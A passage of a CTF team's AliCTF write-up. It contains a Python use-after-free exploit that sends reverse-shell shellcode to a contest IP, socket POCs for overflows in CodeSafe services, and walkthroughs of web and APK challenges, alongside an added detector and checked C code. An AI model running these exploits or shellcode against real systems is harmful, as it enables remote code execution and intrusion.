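HEADER_LEN = 8  # 4-byte leading field + 4-byte command type (assumed layout)


def parse_command(msg):
    """Return the command type from bytes 4..8, or None for a truncated message."""
    if len(msg[:HEADER_LEN]) != HEADER_LEN:
        return None
    return int.from_bytes(msg[4:8], 'little')


def build_request(first_dword, cmd, payload=b''):
    """Constructed request in the layout the writeup describes (not captured traffic)."""
    return first_dword.to_bytes(4, 'little') + cmd.to_bytes(4, 'little') + payload


class UafSequenceDetector:
    """Per-session state machine.

    The dangerous order is: object freed and reallocated (0x3333), and only
    afterwards a virtual call through it (0x5555), so the dispatch goes through
    attacker-supplied memory. A 0x2222 leak earlier in the same session makes
    the call reliable (kernel32/ntdll/object addresses), so it upgrades the alert.
    """

    def __init__(self):
        self._state = defaultdict(lambda: {'leaked': False, 'freed': False})

    def observe(self, session, msg):
        """Feed one request; return an alert name or None."""
        cmd = parse_command(msg)
        st = self._state[session]
        if cmd == CMD_LEAK:
            st['leaked'] = True
        elif cmd == CMD_REALLOC:
            st['freed'] = True
        elif cmd == CMD_VCALL and st['freed']:
            return 'uaf-vcall-after-leak' if st['leaked'] else 'uaf-vcall'
        return None


def scan_session(messages, session='client-1'):
    """Run the detector over one client's requests and collect alerts in order."""
    det = UafSequenceDetector()
    alerts = []
    for msg in messages:
        alert = det.observe(session, msg)
        if alert:
            alerts.append(alert)
    return alerts


if __name__ == '__main__':
    # Constructed sample: the leak, free/realloc, vcall order the writeup uses.
    sample = [
        build_request(0xc, CMD_LEAK),
        build_request(0x100, CMD_REALLOC, b'\x90' * 16),
        build_request(0xc, CMD_VCALL),
    ]
    print(scan_session(sample))  # ['uaf-vcall-after-leak']
```

<p class="md_block"> <span class="md_line">A 0x5555 that arrives before any 0x3333 is treated as the service's normal use of its own object and raises nothing; the rule fires on the order of commands, which is what the writeup's chain depends on, rather than on any particular byte pattern in the payload.</span> </p> <p class="md_block"> 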
<span class="md_line">The exploit is as follows:</span> </p>
<pre><code>#coding:utf-8
from socket import *
import struct

s = socket(AF_INET, SOCK_STREAM)
#s.connect(('192.168.206.133', 55555))
s.connect(('42.120.63.122', 55555))

#leak memory
offset = '\x0c\x00\x00\x00'
data_type = struct.pack('I', 0x2222)
malloc_size = struct.pack('I', 0x400 + 0xc + 4)
send_data = offset + data_type
send_data += '\x90'*(0x500 - len(send_data))
s.send(send_data)
recv_data = s.recv(1024)
kernel32_base = struct.unpack('I', recv_data[0x80:0x84])[0]
nt_base = struct.unpack('I', recv_data[0x84:0x88])[0]
object_add = struct.unpack('I', recv_data[0x88:0x8c])[0]
print 'address of kernel32,ntdll,object are', hex(kernel32_base), hex(nt_base), hex(object_add)

#UAF
offset = struct.pack('I', 0x100)
data_type = struct.pack('I', 0x3333)
nop = '\x90' * (0x100 - 8)
malloc_size = struct.pack('I', 0x400 + 0x100 + 4)
send_data = offset + data_type + nop+ malloc_size
send_data += struct.pack('I', object_add+4)
send_data += '\x90'*8
#virtualprotect
send_data += struct.pack('I', kernel32_base+0x1DC3)
#xchg eax,esp; pop; pop; pop; ret 4
send_data += struct.pack('I', nt_base + 0x7907)
new_object_offset = len(offset + data_type + nop+ malloc_size)
send_data += struct.pack('I', object_add + 0x164-new_object_offset)
send_data += struct.pack('I', object_add + 0x164-new_object_offset)
send_data += struct.pack('I', 0x1000)
send_data += '\x40\x00\x00\x00'
send_data += struct.pack('I', object_add)
send_data += '\x90'*(0x164 - len(send_data))
shellcode = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
shellcode += "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
shellcode += "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
shellcode += "\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
shellcode += "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
shellcode += "\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
shellcode += "\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
shellcode += "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
shellcode += "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
shellcode += "\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
shellcode += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
shellcode += "\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
shellcode += "\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
shellcode += "\x68\x17\x58\xe5\x74\x68\x02\x00\xfc\x15\x89\xe6\x6a\x10\x56"
shellcode += "\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3"
shellcode += "\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24"
shellcode += "\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56"
shellcode += "\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89"
shellcode += "\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0"
shellcode += "\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80"
shellcode += "\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5";
send_data += shellcode
send_data += '\x90'*(0x500 - len(send_data))
s.send(send_data)
print s.recv(1024)

#code execute
offset = '\x0c\x00\x00\x00'
data_type = struct.pack('I', 0x5555)
malloc_size = struct.pack('I', 0x400 + 0xc + 4)
send_data = offset + data_type
send_data += '\x90'*(0x500 - len(send_data))
s.send(send_data)
print s.recv(1024)</code></pre> <!--block_code_end-->
<hr>
<h4 id="toc_16">0x04 WebB</h4>
<h5 id="toc_17">WEBB-100</h5>
<blockquote> <p class="md_block"> <span class="md_line">After logging in<br /></span> <span class="md_line">http://web100b.alictf.com/3ef067863a6db0a7fc218aceaee9366b.php</span> </p> </blockquote>
<p class="md_block"> <span class="md_line">After logging in, capture the traffic: you can see "hi xbb" (bear cub?). The cookie has username and isadmin, and modifying either causes an error (dare you follow the program's rules?), with Sign=df00ea56c4d2e709dbacf0eddf00ea56469b9e30</span> </p>
<p class="md_block"> <span
class="md_line">Modifying them in combination: the Sign is 40 characters on a quick count, and a closer look shows repetition; dropping the first 8 characters, the remaining MD5 decodes to xbb0</span> </p>
<p class="md_block"> <span class="md_line">Then just construct admin1.</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-webb-100-01.png" alt="img" title="" ></span> </p>
<hr>
<h5 id="toc_18">WEBB-200</h5>
<blockquote> <p class="md_block"> <span class="md_line">Casper wrote a secure interface for everyone to fetch page responses. Is it really secure?<br /></span> <span class="md_line">http://web200b.alictf.com/5b03e4d1a8cefc5121e1c1c0dd9b1cdc.php </span> </p> </blockquote>
<p class="md_block"> <span class="md_line">Black-box guesswork; I tried for a long time without figuring it out, assuming it was one of the curl -i tricks, and after a lot of searching found this:</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><a class="md_compiled" href="http://drops.wooyun.org/tips/750">http://drops.wooyun.org/tips/750</a></span> </p>
<p class="md_block"> <span class="md_line">taobao.com@xxx finally got a response..</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-webb-200-01.png" alt="img" title="" ></span> </p>
<hr>
<h5 id="toc_19">WEBB-300</h5>
<blockquote> <p class="md_block"> <span class="md_line">The white hat's secret<br /></span> <span class="md_line"> http://web300b.alictf.com/b5688aa7c3f8387400a3449077f9bd65.php </span> </p> </blockquote>
<p class="md_block"> <span class="md_line">At first the challenge seemed so easy :) So happy to have captured this</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-webb-300-01.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">Then, after staying up all night, I received this</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-webb-300-02.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">Instantly confused. Started working on the challenge: first Flash, with crossdomain.xml set to *, so I tried a CSRF POC</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-webb-300-03.png" alt="img" title="" ></span> </p>
<p
class="md_block"> <span class="md_line">This was a 502 when visited after the contest; normally flag.php could be read. I naively thought this would get the key and submitted the URL... checking the logs there was no request at all... heartbreak..</span> </p>
<p class="md_block"> <span class="md_line">Next, analyzing the whitehat image: binwalk found a hidden rar, and after much guessing the password turned out to be the contest URL. Its contents:</span> </p>
<pre><code>e.g.: *.php?img=exp</code></pre> <!--block_code_end-->
<p class="md_block"> <span class="md_line">The challenge works like the XSS one: submit the challenge page with an img parameter...</span> </p>
<p class="md_block"> <span class="md_line">This was seen when analyzing the d4.swf file:</span> </p>
<pre><code>public dynamic class MainTimeline extends MovieClip {
    public var img:String;
    public var req:URLRequest;
    public var loader:Loader;

    public function MainTimeline(){
        addFrameScript(0, this.frame1);
    }

    public function completed(_arg1:Event):void{
        this.addChild(this.loader);
    }

    function frame1(){
        try {
            ExternalInterface.call("eval", "location.href='http://www.alictf.com/';");
        } catch(errObject:Error) {
            img = loaderInfo.parameters["img"];
            req = new URLRequest(img);
            loader = new Loader();
            loader.load(req);
            loader.contentLoaderInfo.addEventListener(Event.COMPLETE, completed);
        };
    }
}</code></pre> <!--block_code_end-->
<p class="md_block"> <span class="md_line">At the time I felt that even if img was loaded, no XSS would come of it; you would have to supply your own swf. Instead I thought img might be a direct reflected XSS in Firefox... blocked by Chrome's protection, so the idea was still wrong.</span> </p>
<p class="md_block"> <span class="md_line">In the end it turned out there was an upload, but unfortunately I had not scanned for directories... A Flash file can be uploaded as an image, then called via img to execute code that reads the flag file, performing the CSRF.</span> </p>
<hr>
<h5 id="toc_20">WEBB-400</h5>
<blockquote> <p class="md_block"> <span class="md_line">A string of strange digits? Can you help solve the riddle? <br /></span> <span class="md_line">http://web400b.alictf.com/e708f572003bfc59728030f46fb71372.php </span> </p> </blockquote>
<p class="md_block"> <span class="md_line">Opening it shows a number: 2032687698</span> </p>
<p class="md_block"> <span class="md_line">I resisted adding this QQ number to ask for the flag...</span> </p>
<p class="md_block"> <span class="md_line">Clumsily appending it to the URL and requesting that directly downloaded a file: an administrator log, roughly about setting up lnmp and various tool environments, ending with some directory information such as nidongde related to web400a... In the end there was no time and I did not pursue it.</span> </p>
<hr>
<h5 id="toc_21">WEBB-500</h5>
<blockquote> <p class="md_block"> <span class="md_line">Delicious cookies........ Casper ate one after another........ 
<br /></span> <span class="md_line">hint: do you really have to give it to me? Try bypassing it. Don't forget to look at the URL.<br /></span> <span class="md_line">http://web500b.alictf.com/26b8f91a01158be64de4cd299cf16f53.php </span> </p> </blockquote>
<p class="md_block"> <span class="md_line">Another guessing challenge... after curl -i I found that no cookie needed to be submitted at all,</span> </p>
<p class="md_block"> <span class="md_line">http://web500b.alictf.com/ee11cbb19052e40b07aac0ca060c23ee.php</span> </p>
<p class="md_block"> <span class="md_line">It was said that commands could be executed... but nothing ever came back... I read<br /></span> <span class="md_line">http://web500b.alictf.com/js/user.js<br /></span> <span class="md_line">could not make sense of it, and ignored it...</span> </p>
<hr>
<h4 id="toc_22">0x05 CodeSafe</h4>
<h5 id="toc_23">CodeSafe-100</h5>
<blockquote> <p class="md_block"> <span class="md_line">A service is open on port 30000 of the 32-bit host codesafe100.alictf.com.<br /></span> <span class="md_line">Its source file is rpc_libevent_server.cpp.<br /></span> <span class="md_line">The service contains 1 security vulnerability. Find it by reading the source code and send a request to the server to try to trigger it.<br /></span> <span class="md_line">If the request triggers the vulnerability, the server's response will contain a 32-character MD5 value as the flag, for example:<br /></span> <span class="md_line">Flag: DC80A72CBBB71C1F6CB98E3C2935B2C0<br /></span> <span class="md_line">Note: the token field in the request is each contestant's authentication hash (see the user_token assigned in the account registration email).<br /></span> <span class="md_line">Each valid token has only 5 chances to submit a request; after that, requests with that token are dropped.</span> </p> </blockquote>
<p class="md_block"> <span class="md_line">From socket_read_callback we know the protocol for the SafeCode series is:<br /></span> <span class="md_line">Token_len (1 byte) + Token + funcid (1 byte) + data_len (4 bytes) + data<br /></span> <span class="md_line">The vulnerable function in SafeCode100 is rpc_function_1:</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-codesafe-100-01.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">mtl is of type unsigned short, while the maximum values temp.tl and tl can hold are 511 and 199,</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-codesafe-100-02.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span
class="md_line">and 511*199 = 101689 = 0x18D39<br /></span> <span class="md_line">exceeds the maximum an unsigned short can represent. So when temp.tl and tl are large enough, an integer overflow occurs.</span> </p>
<p class="md_block"> <span class="md_line">POC:</span> </p>
<pre><code>#coding:utf-8
from socket import *
import struct
import time

s = socket(AF_INET, SOCK_STREAM)
s.connect(('223.6.253.103', 30000))
token = 'bab1e617f537b121033058a5795e37e0'
len_token = '\x20'
f_id = '\x02'
data = '\x48\x48\x00\x00'
#data += '\xcc'*4
data += struct.pack('I', int(time.time()))
data += '\x02\x00\x00\x00'
data += 'sdatsts-afu\x00\x00\x00\x00\x00'
url = 'http://alibaba.com/'
url += 'a'*(256-len(url))
len_url = len(url)
data += struct.pack('I', len_url)
data += url
len_data = len(data)
send_data = len_token + token + f_id + struct.pack('&gt;I', len_data) + data
print send_data
s.send(send_data)
print s.recv(1024)</code></pre> <!--block_code_end-->
<hr>
<h5 id="toc_24">CodeSafe-200</h5>
<blockquote> <p class="md_block"> <span class="md_line">A service is open on port 30000 of the 32-bit host codesafe200.alictf.com.<br /></span> <span class="md_line"> Its source file is rpc_libevent_server.cpp.<br /></span> <span class="md_line"> The service contains 1 security vulnerability. Find it by reading the source code and send a request to the server to try to trigger it.<br /></span> <span class="md_line"> If the request triggers the vulnerability, the server's response will contain a 32-character MD5 value as the flag, for example:<br /></span> <span class="md_line"> Flag: DC80A72CBBB71C1F6CB98E3C2935B2C0<br /></span> <span class="md_line"> Note: the token field in the request is each contestant's authentication hash (see the user_token assigned in the account registration email).<br /></span> <span class="md_line"> Each valid token has only 4 chances to submit a request; after that, requests with that token are dropped.<br /></span> <span class="md_line"> Challenge download: click to download</span> </p> </blockquote>
<p class="md_block"> <span class="md_line">The vulnerable function is rpc_function_2</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-codesafe-200-01.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">The buffer is 512 bytes, and the incoming data can be at most 511 bytes</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled "
src="/img/alictf-codesafe-200-02.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">The function expects input in the form tag = value, but at the end it uses sprintf to print line (the data), tag and value all into a buffer of only 512 bytes. Input that satisfies the format requirement, with the remaining bytes padded with spaces, causes an overflow.</span> </p>
<p class="md_block"> <span class="md_line">POC:</span> </p>
<pre><code>#coding:utf-8
from socket import *
import struct

s = socket(AF_INET, SOCK_STREAM)
s.connect(('42.120.63.194', 30000))
token = 'bab1e617f537b121033058a5795e37e0'
len_token = '\x20'
f_id = '\x02'
data = ' ' + 'a'*60 + '=' + '1834567890123456'
data += ' '* (510 - len(data))
len_data = len(data)
send_data = len_token + token + f_id + struct.pack('&gt;I', len_data) + data
print send_data
s.send(send_data)
print s.recv(1024)</code></pre> <!--block_code_end-->
<hr>
<h5 id="toc_25">CodeSafe-300</h5>
<blockquote> <p class="md_block"> <span class="md_line">A service is open on port 30000 of the 32-bit host codesafe300.alictf.com.<br /></span> <span class="md_line">Its source file is rpc_libevent_server.cpp.<br /></span> <span class="md_line">The service contains 1 buffer overflow vulnerability. Find it by reading the source code and send a request to the server to try to trigger it.<br /></span> <span class="md_line">If the request triggers the vulnerability, the server's response will contain a 32-character MD5 value as the flag, for example:<br /></span> <span class="md_line">Flag: DC80A72CBBB71C1F6CB98E3C2935B2C0<br /></span> <span class="md_line">Note: the token field in the request is each contestant's authentication hash (see the user_token assigned in the account registration email).<br /></span> <span class="md_line">Each valid token has only 3 chances to submit a request; after that, requests with that token are dropped.</span> </p> </blockquote>
<p class="md_block"> <span class="md_line">The vulnerability is in the function rpc_fuction_2</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-codesafe-300-01.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">p is the absolute path of the requested URL</span> </p>
<p class="md_block"> <span class="md_line">r is allocated 256 bytes</span> </p>
<p class="md_block"> <span class="md_line">The URL size is also 256</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-codesafe-300-02.png" alt="img" title=""
></span> </p>
<p class="md_block"> <span class="md_line">A URL in the format the function requires looks like:</span> </p>
<p class="md_block"> <span class="md_line">http:// alibaba.com/xxxx</span> </p>
<p class="md_block"> <span class="md_line">Here &quot;http:// alibaba.com/&quot; is 20 bytes and /temporary folder/2014-08/ is 26 bytes. So if a 256-byte URL is supplied, the absolute path is 236 bytes, which after being printed by sprintf becomes 262 bytes, causing the overflow.</span> </p>
<p class="md_block"> <span class="md_line">POC:</span> </p>
<pre><code>#coding:utf-8
from socket import *
import struct
import time

s = socket(AF_INET, SOCK_STREAM)
s.connect(('223.6.253.103', 30000))
#token = 'bab1e617f537b121033058a5795e37e0'
token = 'afc0f1402e0439fb57e87b45ab456b37'
len_token = '\x20'
f_id = '\x02'
data = '\x48\x48\x00\x00'
#data += '\xcc'*4
data += struct.pack('I', int(time.time()))
data += '\x02\x00\x00\x00'
data += 'sdatsts-afu\x00\x00\x00\x00\x00'
url = 'http://alibaba.com/'
url += 'a'*(256-len(url))
len_url = len(url)
data += struct.pack('I', len_url)
data += url
len_data = len(data)
send_data = len_token + token + f_id + struct.pack('&gt;I', len_data) + data
print send_data
s.send(send_data)
print s.recv(1024)</code></pre> <!--block_code_end-->
<hr>
<h5 id="toc_26">CodeSafe-400</h5>
<blockquote> <p class="md_block"> <span class="md_line">A service is open on port 30000 of the 32-bit host codesafe400.alictf.com.<br /></span> <span class="md_line"> Its source file is rpc_libevent_server.cpp.<br /></span> <span class="md_line"> The service contains 1 security vulnerability. Find it by reading the source code and send a request to the server to try to trigger it.<br /></span> <span class="md_line"> If the request triggers the vulnerability, the server's response will contain a 32-character MD5 value as the flag, for example:<br /></span> <span class="md_line"> Flag: DC80A72CBBB71C1F6CB98E3C2935B2C0<br /></span> <span class="md_line"> Note: the token field in the request is each contestant's authentication hash (see the user_token assigned in the account registration email).<br /></span> <span class="md_line"> Each valid token has only 2 chances to submit a request; after that, requests with that token are dropped.</span> </p> </blockquote>
<p class="md_block"> <span class="md_line">I have to complain about this one: the indentation was simply beautiful</span> </p>
<p class="md_block"> <span class="md_line">As soon as the program reaches the system function it returns the key</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img
class="md_compiled " src="/img/alictf-codesafe-400-01.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">But this spot tripped me up for a long time... I just could not see it =0=</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-codesafe-400-02.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">Once I saw it, it was easy</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-codesafe-400-03.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">After the Guest password check, function1 is called once more to strip spaces, and szUser is copied from the first 63 bytes of temp.user.</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-codesafe-400-04.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">So a string like admin + 64*&#39;\x20&#39; + a is enough to bypass it</span> </p>
<p class="md_block"> <span class="md_line">POC:</span> </p>
<pre><code>#include&lt;stdio.h&gt;
#include&lt;string.h&gt;
#include&lt;ctype.h&gt;
#include&lt;malloc.h&gt;
#include&lt;time.h&gt;

/* Vigenere-style shift of m with key k; result written to r in upper case */
void function3(char m[],char k[],char r[])
{
    int i,j,s=0;
    j=strlen(k);
    for(i=0;m[i];i++)
        m[i]=tolower(m[i]);
    for(i=0;m[i];i++)
        if(isalpha(m[i])) {
            r[i]=(m[i]-'a'+k[s%j]-'a')%26+'a';
            s++;
        } else
            r[i]=m[i];
    r[i]=0;
    for(i=0;r[i];i++)
        r[i]=toupper(r[i]);
}

int main()
{
    char pass[64] = {0}, value[64];
    memcpy(pass, "aiwtnbx", 7);
    function3(pass, "admin", value);
    printf("%s", value);
    if(strcmp(value,"ALIBABA") == 0)
        printf("%s", "True");
    else
        printf("%s", "false");
    return 0;
}</code></pre> <!--block_code_end-->
<hr>
<h4 id="toc_27">0x06 EvalAPK</h4>
<h5 id="toc_28">EvilAPK-100</h5>
<blockquote> <p class="md_block"> <span class="md_line">During execution the APK uses a file as input. What is the name of that file? (path not needed)<br /></span> <span class="md_line">Challenge download: click to download</span> </p> </blockquote>
<p class="md_block"> <span
class="md_line">First blood. None of the three of us was familiar with APKs and we had no analysis environment. We had meant to do Web100 and stared at it for ages (its address leaked early in the contest) without solving it; seeing APK100 being submitted so cheerfully we gave it a go, and unexpectedly a quick strings run produced it.</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-apk-100-01.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">Submitting inputfile solved it</span> </p>
<hr>
<h5 id="toc_29">EvilAPK-200</h5>
<blockquote> <p class="md_block"> <span class="md_line">Please analyze the static_analysis.apk package.<br /></span> <span class="md_line">Determine how many places in the static code call the sendSMS method (not counting the method itself; the flag is a number)<br /></span> <span class="md_line">Challenge download: click to download</span> </p> </blockquote>
<p class="md_block"> <span class="md_line">After decompiling with apktool d xx.apk, use the find command</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-apk-200-01.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">The image above is the shell history on Kali...</span> </p>
<hr>
<h5 id="toc_30">EvilAPK-300</h5>
<blockquote> <p class="md_block"> <span class="md_line">The main screen of the crackme jscrack contains two controls:<br /></span> <span class="md_line"> 1) a URL input box<br /></span> <span class="md_line"> 2) an "Enter" button<br /></span> <span class="md_line"> You must build your own web page and enter its URL into the URL input box, then click the "Enter" button; jscrack will open your page in a WebView. If jscrack pops up a Toast, the crack succeeded, and the content of the Toast is the flag for this challenge.<br /></span> <span class="md_line"> Challenge download: click to download</span> </p> </blockquote>
<p class="md_block"> <span class="md_line">From the description this relates to a WebView vulnerability, so I searched for material</span> </p>
<p class="md_block"> <span class="md_line">and got a POC for testing the exposed interfaces</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><a class="md_compiled" href="http://drops.wooyun.org/webview.html">http://drops.wooyun.org/webview.html</a></span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-apk-300-01.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span
class="md_line">With the problematic interface SmokeyBear found, I went on to learn what a Toast is, how to show one and how to use the interface, imitated the wooyun detection page, and finally tried interface.showToast(), and it really appeared... reference article below:</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-apk-300-02.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">Put the following page on a server for testing</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/alictf-apk-300-03.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">Visit it with jscrack to get the flag</span> </p>
<p class="md_block"> <span class="md_line">Nobody on the team was familiar with the other APK challenges, so we had to give up... Thanks to the APK challenge author for keeping the first three easy...</span> </p>
<h4 id="toc_31">0x07 AfterAll</h4>
<p class="md_block"> <span class="md_line">Thx AliCTF.</span> </p>
<p class="md_block"> <span class="md_line">::L Team::</span> </p>
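<p class="md_block"> <span class="md_line">Added example, not part of the original writeup and not the contest's rpc_libevent_server.cpp: the two bug classes behind CodeSafe-100 and CodeSafe-200/300, a product of two lengths stored in an unsigned short that wraps, and an sprintf of a fixed prefix plus a caller-sized path into a 256-byte buffer, each shown beside the check that rejects the bad input. The numbers (511, 199, 256, 26, 236) and the prefix /temporary folder/2014-08/ come from the writeup; the function names, the "%s%s" format and the 236-byte sample path are assumptions made for this example, and the vulnerable variants only compute the size they would write instead of performing the unsafe write.</span> </p>

```c
#include <limits.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not the contest source. The numbers (511, 199, 256, 26,
   236) are the ones the writeup reports; the function names and the
   "%s%s" format are assumptions made for this example. */

/* CodeSafe-100 pattern: two lengths multiplied into an unsigned short.
   511 * 199 = 101689 = 0x18D39 needs 17 bits, so the 16-bit store keeps
   only 0x8D39 and any later bounds check uses a value far too small. */
unsigned short length_product_truncated(unsigned tl_a, unsigned tl_b)
{
    unsigned short mtl = (unsigned short)(tl_a * tl_b); /* silently wraps */
    return mtl;
}

/* Checked version: do the arithmetic in a wider type and reject anything
   that does not fit the destination. Returns -1 on overflow. */
long length_product_checked(unsigned tl_a, unsigned tl_b)
{
    uint32_t full = (uint32_t)tl_a * (uint32_t)tl_b;
    if (full > USHRT_MAX)
        return -1;
    return (long)full;
}

/* CodeSafe-200/300 pattern: sprintf of a fixed prefix plus a caller-sized
   path into a 256-byte buffer. With the 26-byte prefix and a 236-byte
   path the result is 262 bytes, as the writeup computes. */
#define PATH_BUF_SIZE 256
#define MAX_PATH_LEN 236
static const char PATH_PREFIX[] = "/temporary folder/2014-08/";

/* Builds the writeup's boundary case: a 236-byte path of 'a' characters
   (constructed sample input, not contest data). p must hold 237 bytes. */
static void make_max_path(char *p)
{
    memset(p, 'a', MAX_PATH_LEN);
    p[MAX_PATH_LEN] = '\0';
}

/* Bytes the unchecked sprintf(r, "%s%s", PATH_PREFIX, p) would write,
   excluding the NUL. Reproduces the size arithmetic without the write. */
size_t path_bytes_needed(const char *p)
{
    return strlen(PATH_PREFIX) + strlen(p);
}

size_t max_path_bytes_needed(void)
{
    char p[MAX_PATH_LEN + 1];
    make_max_path(p);
    return path_bytes_needed(p);
}

/* Checked join: snprintf never writes past rsize, and its return value
   says whether the output was truncated. Returns 0 on success, -1 (with
   an empty buffer) when the input would not fit. */
int path_join_checked(char *r, size_t rsize, const char *p)
{
    int n = snprintf(r, rsize, "%s%s", PATH_PREFIX, p);
    if (n < 0 || (size_t)n >= rsize) {
        r[0] = '\0';
        return -1;
    }
    return 0;
}

/* 1 when the checked join rejects the 236-byte path, 0 otherwise. */
int max_path_is_rejected(void)
{
    char p[MAX_PATH_LEN + 1];
    char r[PATH_BUF_SIZE];
    make_max_path(p);
    return path_join_checked(r, sizeof r, p) == -1;
}

/* 1 when a short path joins to the expected string, 0 otherwise. */
int short_path_join_ok(void)
{
    char r[PATH_BUF_SIZE];
    if (path_join_checked(r, sizeof r, "note.txt") != 0)
        return 0;
    return strcmp(r, "/temporary folder/2014-08/note.txt") == 0;
}

int main(void)
{
    printf("511*199 stored in unsigned short: 0x%04x\n",
           length_product_truncated(511, 199));
    printf("checked product: %ld\n", length_product_checked(511, 199));
    printf("bytes sprintf would write: %zu (buffer is %d)\n",
           max_path_bytes_needed(), PATH_BUF_SIZE);
    printf("236-byte path rejected: %d\n", max_path_is_rejected());
    printf("short path joins cleanly: %d\n", short_path_join_ok());
    return 0;
}
```

<p class="md_block"> <span class="md_line">The two checks share one idea: compute the size in a type wide enough to hold the true value before anything is stored or written, and treat "does not fit" as an error rather than letting the hardware wrap the number or sprintf run past the buffer. The snprintf return value is what makes truncation visible; a plain sprintf gives the caller no way to notice that 262 bytes went into a 256-byte r.</span> </p>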